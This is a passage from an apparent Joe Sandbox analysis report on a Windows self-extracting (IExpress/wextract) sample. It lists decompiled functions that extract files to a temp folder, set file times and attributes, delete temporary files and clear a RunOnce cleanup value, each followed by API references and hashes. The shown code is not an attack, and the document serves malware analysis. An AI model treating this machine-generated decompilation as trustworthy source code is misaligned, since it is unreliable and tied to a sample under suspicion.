                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3183975587-0
                                                                                                                                                                                                                                                • Opcode ID: cbdb35ef580712d3307cca65b3e4507e8675ad637dcbb609a99d5c681b2c6c1b
                                                                                                                                                                                                                                                • Instruction ID: c925b1d8c378c538314b4cc6a9addfa4462e0e33498ff9556c356ad5e0fc7219
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbdb35ef580712d3307cca65b3e4507e8675ad637dcbb609a99d5c681b2c6c1b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC31C231640718ABFB609B65DC4DFEB77BCEB95706F2002A9FA05D21A1CA344CC9CB65
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E000551E5(void* __eflags) {
                                                                                                                                                                                                                                                				int _t5;
                                                                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                                                                				void* _t28;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t1 = E0005468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                                				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                                				if(_t28 != 0) {
                                                                                                                                                                                                                                                					if(E0005468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                                						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                                						if(_t5 != 0) {
                                                                                                                                                                                                                                                							_t6 = E000544B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                                							LocalFree(_t28);
                                                                                                                                                                                                                                                							if(_t6 != 6) {
                                                                                                                                                                                                                                                								 *0x59124 = 0x800704c7;
                                                                                                                                                                                                                                                								L10:
                                                                                                                                                                                                                                                								return 0;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							 *0x59124 = 0;
                                                                                                                                                                                                                                                							L6:
                                                                                                                                                                                                                                                							return 1;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						LocalFree(_t28);
                                                                                                                                                                                                                                                						goto L6;
        }
        E000544B9(0, 0x4b1, 0, 0, 0x10, 0);
        LocalFree(_t28);
         *0x59124 = 0x80070714;
        goto L10;
    }
    E000544B9(0, 0x4b5, 0, 0, 0x10, 0);
     *0x59124 = E00056285();
    goto L10;
}







APIs
  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546A0
  • Part of subcall function 0005468F: SizeofResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546A9
  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546C3
  • Part of subcall function 0005468F: LoadResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546CC
  • Part of subcall function 0005468F: LockResource.KERNEL32(00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546D3
  • Part of subcall function 0005468F: memcpy_s.MSVCRT ref: 000546E5
  • Part of subcall function 0005468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000546EF
• LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00052F4D,?,00000002,00000000), ref: 00055201
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00055250
  • Part of subcall function 000544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00054518
  • Part of subcall function 000544B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00054554
  • Part of subcall function 00056285: GetLastError.KERNEL32(00055BBC), ref: 00056285
Strings
Memory Dump Source
• Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Similarity
• API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
• String ID: <None>$UPROMPT
• API String ID: 957408736-2980973527
• Opcode ID: d3e6bbbfa9a0ec66bff6a4ef36936e77c7100f7fc0a5c6c28e02179c3d7af0f4
• Instruction ID: a8d0a5f964484bdc7e9db1c0f01b74a00e12986de796e1fef5cdd7a602ee3e81
• Opcode Fuzzy Hash: d3e6bbbfa9a0ec66bff6a4ef36936e77c7100f7fc0a5c6c28e02179c3d7af0f4
• Instruction Fuzzy Hash: A211E2B5340701ABE7646BB19C59BBF62DDDB8A397F104029BF02D61D1DA7D8C084629
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 74%
E000552B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
    signed int _v8;
    char _v268;
    signed int _t9;
    signed int _t11;
    void* _t21;
    void* _t29;
    CHAR** _t31;
    void* _t32;
    signed int _t33;

    _t28 = __edi;
    _t22 = __ecx;
    _t21 = __ebx;
    _t9 =  *0x58004; // 0x5a679bd9
    _v8 = _t9 ^ _t33;
    _push(__esi);
    _t31 =  *0x591e0; // 0x26d7100
    if(_t31 != 0) {
        _push(__edi);
        do {
            _t29 = _t31;
            if( *0x58a24 == 0 &&  *0x59a30 == 0) {
                SetFileAttributesA( *_t31, 0x80); // executed
                DeleteFileA( *_t31); // executed
            }
            _t31 = _t31[1];
            LocalFree( *_t29);
            LocalFree(_t29);
        } while (_t31 != 0);
        _pop(_t28);
    }
    _t11 =  *0x58a20; // 0x0
    _pop(_t32);
    if(_t11 != 0 &&  *0x58a24 == 0 &&  *0x59a30 == 0) {
        _push(_t22);
        E00051781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
        if(( *0x59a34 & 0x00000020) != 0) {
            E000565E8( &_v268);
        }
        SetCurrentDirectoryA(".."); // executed
        _t22 =  &_v268;
        E00052390( &_v268);
        _t11 =  *0x58a20; // 0x0
    }
    if( *0x59a40 != 1 && _t11 != 0) {
        _t11 = E00051FE1(_t22); // executed
    }
     *0x58a20 =  *0x58a20 & 0x00000000;
    return E00056CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
}













                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNELBASE(026D7100,00000080,?,00000000), ref: 000552F2
                                                                                                                                                                                                                                                • DeleteFileA.KERNELBASE(026D7100), ref: 000552FA
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(026D7100,?,00000000), ref: 00055305
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(026D7100), ref: 0005530C
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(000511FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00055363
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00055334
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                                • API String ID: 2833751637-2312194364
                                                                                                                                                                                                                                                • Opcode ID: 6ce51f1f50b11d5c9cdb0f381e52b438b4aa7e1f05b312978881974b1287a2a1
                                                                                                                                                                                                                                                • Instruction ID: def98ca0d54556d7944280f325426f55348c1c182f343a5f14f26831c93ac3eb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ce51f1f50b11d5c9cdb0f381e52b438b4aa7e1f05b312978881974b1287a2a1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8921CF31520B14DBFBA09B20DC19BAB37F4EB04353F040259EC46671A1DBB95E8CCB91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00051FE1(void* __ecx) {
                                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                                				long _t4;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				if( *0x58530 != 0) {
                                                                                                                                                                                                                                                					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                                					if(_t4 == 0) {
                                                                                                                                                                                                                                                						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                                                                                                                                                                                                						return RegCloseKey(_v8);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t4;
                                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0005538C,?,?,0005538C), ref: 00052005
                                                                                                                                                                                                                                                • RegDeleteValueA.KERNELBASE(0005538C,wextract_cleanup0,?,?,0005538C), ref: 00052017
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(0005538C,?,?,0005538C), ref: 00052020
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                                                                • API String ID: 849931509-702805525
                                                                                                                                                                                                                                                • Opcode ID: c3ef6ad4896c4da65a6bf66d40c8a972a0890fe1408a482a93e06eac95b99c43
                                                                                                                                                                                                                                                • Instruction ID: 4c8750cc98c5304c87fe5155abf21f1622065fa5cfe366bb9c2512a0ded4aaac
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3ef6ad4896c4da65a6bf66d40c8a972a0890fe1408a482a93e06eac95b99c43
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CDE04F34661318FBEB218F90EC0EF5B7B69FB02783F101295BE04B00E1EB659A18D705
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

C-Code - Quality: 94%
E00054CD0(char* __edx, long _a4, int _a8) {
	signed int _v8;
	char _v268;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t29;
	int _t30;
	long _t32;
	signed int _t33;
	long _t35;
	long _t36;
	struct HWND__* _t37;
	long _t38;
	long _t39;
	long _t41;
	long _t44;
	long _t45;
	long _t46;
	signed int _t50;
	long _t51;
	char* _t58;
	long _t59;
	char* _t63;
	long _t64;
	CHAR* _t71;
	CHAR* _t74;
	int _t75;
	signed int _t76;

	_t69 = __edx;
	_t29 =  *0x58004; // 0x5a679bd9
	_t30 = _t29 ^ _t76;
	_v8 = _t30;
	_t75 = _a8;
	if( *0x591d8 == 0) {
		_t32 = _a4;
		__eflags = _t32;
		if(_t32 == 0) {
			_t33 = E00054E99(_t75);
			L35:
			return E00056CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
		}
		_t35 = _t32 - 1;
		__eflags = _t35;
		if(_t35 == 0) {
			L9:
			_t33 = 0;
			goto L35;
		}
		_t36 = _t35 - 1;
		__eflags = _t36;
		if(_t36 == 0) {
			_t37 =  *0x58584; // 0x0
			__eflags = _t37;
			if(_t37 != 0) {
				SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
			}
			_t54 = 0x591e4;
			_t58 = 0x591e4;
			do {
				_t38 =  *_t58;
				_t58 =  &(_t58[1]);
				__eflags = _t38;
			} while (_t38 != 0);
			_t59 = _t58 - 0x591e5;
			__eflags = _t59;
			_t71 =  *(_t75 + 4);
			_t73 =  &(_t71[1]);
			do {
				_t39 =  *_t71;
				_t71 =  &(_t71[1]);
				__eflags = _t39;
			} while (_t39 != 0);
			_t69 = _t71 - _t73;
			_t30 = _t59 + 1 + _t71 - _t73;
			__eflags = _t30 - 0x104;
			if(_t30 >= 0x104) {
				L3:
				_t33 = _t30 | 0xffffffff;
				goto L35;
			}
			_t69 = 0x591e4;
			_t30 = E00054702( &_v268, 0x591e4,  *(_t75 + 4));
			__eflags = _t30;
			if(__eflags == 0) {
				goto L3;
			}
			_t41 = E0005476D( &_v268, __eflags);
			__eflags = _t41;
			if(_t41 == 0) {
				goto L9;
			}
			_push(0x180);
			_t30 = E00054980( &_v268, 0x8302); // executed
			_t75 = _t30;
			__eflags = _t75 - 0xffffffff;
			if(_t75 == 0xffffffff) {
				goto L3;
			}
			_t30 = E000547E0( &_v268);
			__eflags = _t30;
			if(_t30 == 0) {
				goto L3;
			}
			 *0x593f4 =  *0x593f4 + 1;
			_t33 = _t75;
			goto L35;
		}
		_t44 = _t36 - 1;
		__eflags = _t44;
		if(_t44 == 0) {
			_t54 = 0x591e4;
			_t63 = 0x591e4;
			do {
				_t45 =  *_t63;
				_t63 =  &(_t63[1]);
				__eflags = _t45;
			} while (_t45 != 0);
			_t74 =  *(_t75 + 4);
			_t64 = _t63 - 0x591e5;
			__eflags = _t64;
			_t69 =  &(_t74[1]);
			do {
				_t46 =  *_t74;
				_t74 =  &(_t74[1]);
				__eflags = _t46;
			} while (_t46 != 0);
			_t73 = _t74 - _t69;
			_t30 = _t64 + 1 + _t74 - _t69;
			__eflags = _t30 - 0x104;
			if(_t30 >= 0x104) {
				goto L3;
			}
			_t69 = 0x591e4;
			_t30 = E00054702( &_v268, 0x591e4,  *(_t75 + 4));
			__eflags = _t30;
			if(_t30 == 0) {
                                                                                                                                                                                                                                                							goto L3;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                                						_t30 = E00054C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                                						__eflags = _t30;
                                                                                                                                                                                                                                                						if(_t30 == 0) {
                                                                                                                                                                                                                                                							goto L3;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						E00054B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                                						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                                						__eflags = _t50;
                                                                                                                                                                                                                                                						if(_t50 != 0) {
                                                                                                                                                                                                                                                							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                                							__eflags = _t51;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t51 = 0x80;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                                						__eflags = _t30;
                                                                                                                                                                                                                                                						if(_t30 == 0) {
                                                                                                                                                                                                                                                							goto L3;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t33 = 1;
                                                                                                                                                                                                                                                							goto L35;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t30 = _t44 - 1;
                                                                                                                                                                                                                                                					__eflags = _t30;
                                                                                                                                                                                                                                                					if(_t30 == 0) {
                                                                                                                                                                                                                                                						goto L3;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_a4 == 3) {
                                                                                                                                                                                                                                                					_t30 = E00054B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				goto L3;
                                                                                                                                                                                                                                                			}































                                                                                                                                                                                                                                                0x00054d43
                                                                                                                                                                                                                                                0x00054d43
                                                                                                                                                                                                                                                0x00054d47
                                                                                                                                                                                                                                                0x00054d4a
                                                                                                                                                                                                                                                0x00054d4a
                                                                                                                                                                                                                                                0x00054d4c
                                                                                                                                                                                                                                                0x00054d4f
                                                                                                                                                                                                                                                0x00054d4f
                                                                                                                                                                                                                                                0x00054d51
                                                                                                                                                                                                                                                0x00054d52
                                                                                                                                                                                                                                                0x00054d52
                                                                                                                                                                                                                                                0x00054d56
                                                                                                                                                                                                                                                0x00054d5b
                                                                                                                                                                                                                                                0x00054d5d
                                                                                                                                                                                                                                                0x00054d62
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054d67
                                                                                                                                                                                                                                                0x00054d6f
                                                                                                                                                                                                                                                0x00054d74
                                                                                                                                                                                                                                                0x00054d76
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054d7c
                                                                                                                                                                                                                                                0x00054d84
                                                                                                                                                                                                                                                0x00054d89
                                                                                                                                                                                                                                                0x00054d8b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054d94
                                                                                                                                                                                                                                                0x00054d99
                                                                                                                                                                                                                                                0x00054d9e
                                                                                                                                                                                                                                                0x00054da1
                                                                                                                                                                                                                                                0x00054daa
                                                                                                                                                                                                                                                0x00054daa
                                                                                                                                                                                                                                                0x00054da3
                                                                                                                                                                                                                                                0x00054da3
                                                                                                                                                                                                                                                0x00054da3
                                                                                                                                                                                                                                                0x00054db5
                                                                                                                                                                                                                                                0x00054dbb
                                                                                                                                                                                                                                                0x00054dbd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054dc3
                                                                                                                                                                                                                                                0x00054dc5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054dc5
                                                                                                                                                                                                                                                0x00054dbd
                                                                                                                                                                                                                                                0x00054d2a
                                                                                                                                                                                                                                                0x00054d2a
                                                                                                                                                                                                                                                0x00054d2d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054d2d
                                                                                                                                                                                                                                                0x00054cf8
                                                                                                                                                                                                                                                0x00054cfd
                                                                                                                                                                                                                                                0x00054d02
                                                                                                                                                                                                                                                0x00000000

APIs
• SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00054DB5
• SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00054DDD
Strings
Memory Dump Source
• Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Similarity
• API ID: AttributesFileItemText
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
• API String ID: 3625706803-2312194364
• Opcode ID: 8eff0ce2bdcc9daf77648b4e1408f3f8a88e830fe493bab3270921f041dc2eda
• Instruction ID: 40408f4d2313da32803b5c5a7b0201057bca7bf2c5476d6babe9678fe1db6fc3
• Opcode Fuzzy Hash: 8eff0ce2bdcc9daf77648b4e1408f3f8a88e830fe493bab3270921f041dc2eda
• Instruction Fuzzy Hash: C04103362042059BCB659F28DD486FB77F5AB4530AF044668DC8697286EA32DECEC760
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00054C37(signed int __ecx, int __edx, int _a4) {
    struct _FILETIME _v12;
    struct _FILETIME _v20;
    FILETIME* _t14;
    int _t15;
    signed int _t21;

    _t21 = __ecx * 0x18;
    if( *((intOrPtr*)(_t21 + 0x58d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
        L5:
        return 0;
    } else {
        _t14 =  &_v12;
        _t15 = SetFileTime( *(_t21 + 0x58d74), _t14, _t14, _t14); // executed
        if(_t15 == 0) {
            goto L5;
        }
        return 1;
    }
}









                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • DosDateTimeToFileTime.KERNEL32 ref: 00054C54
                                                                                                                                                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00054C66
                                                                                                                                                                                                                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 00054C7E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2071732420-0
                                                                                                                                                                                                                                                • Opcode ID: 43b8eac59e9cdcf0221faefe09e5b3f972a77eeb2de665ad9dfe0c08af853472
                                                                                                                                                                                                                                                • Instruction ID: af539deacb17653650719ee11cedf309a3a86949961ccb2f87ffb1a1e9188f8d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43b8eac59e9cdcf0221faefe09e5b3f972a77eeb2de665ad9dfe0c08af853472
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57F06D72601208ABABA49FB5CC489FB7BECEB45346B44462AAD16D2050EA34D958C7A0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E0005487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                                				void* _t7;
                                                                                                                                                                                                                                                				CHAR* _t11;
                                                                                                                                                                                                                                                				long _t18;
                                                                                                                                                                                                                                                				long _t23;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t11 = __ecx;
                                                                                                                                                                                                                                                				asm("sbb edi, edi");
                                                                                                                                                                                                                                                				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                                				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                                					asm("sbb esi, esi");
                                                                                                                                                                                                                                                					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                                						asm("sbb esi, esi");
                                                                                                                                                                                                                                                						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t23 = 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                                				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                                					return _t7;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					E0005490C(_t11);
                                                                                                                                                                                                                                                					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}








                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00054A23,?,00054F67,*MEMCAB,00008000,00000180), ref: 000548DE
                                                                                                                                                                                                                                                • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00054F67,*MEMCAB,00008000,00000180), ref: 00054902
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                • Opcode ID: 12c0181d36102e4aa71de0a7f1fce9351dc008d2a7b622e026d3e5b49893b2a5
                                                                                                                                                                                                                                                • Instruction ID: 16b1493cceefb0c91c76bdf62fc19bb36faf45f540adcc6590f5bdc2cd080bc2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12c0181d36102e4aa71de0a7f1fce9351dc008d2a7b622e026d3e5b49893b2a5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD014BA3E1167026F36440294C8DFFB555CDB9673AF1B0335BDAAE71D2D9645C8881E0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E00054AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                                                				signed int _t9;
                                                                                                                                                                                                                                                				int _t12;
                                                                                                                                                                                                                                                				signed int _t14;
                                                                                                                                                                                                                                                				signed int _t15;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				struct HWND__* _t21;
                                                                                                                                                                                                                                                				signed int _t24;
                                                                                                                                                                                                                                                				signed int _t25;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t20 =  *0x5858c; // 0x270
                                                                                                                                                                                                                                                				_t9 = E00053680(_t20);
                                                                                                                                                                                                                                                				if( *0x591d8 == 0) {
                                                                                                                                                                                                                                                					_push(_t24);
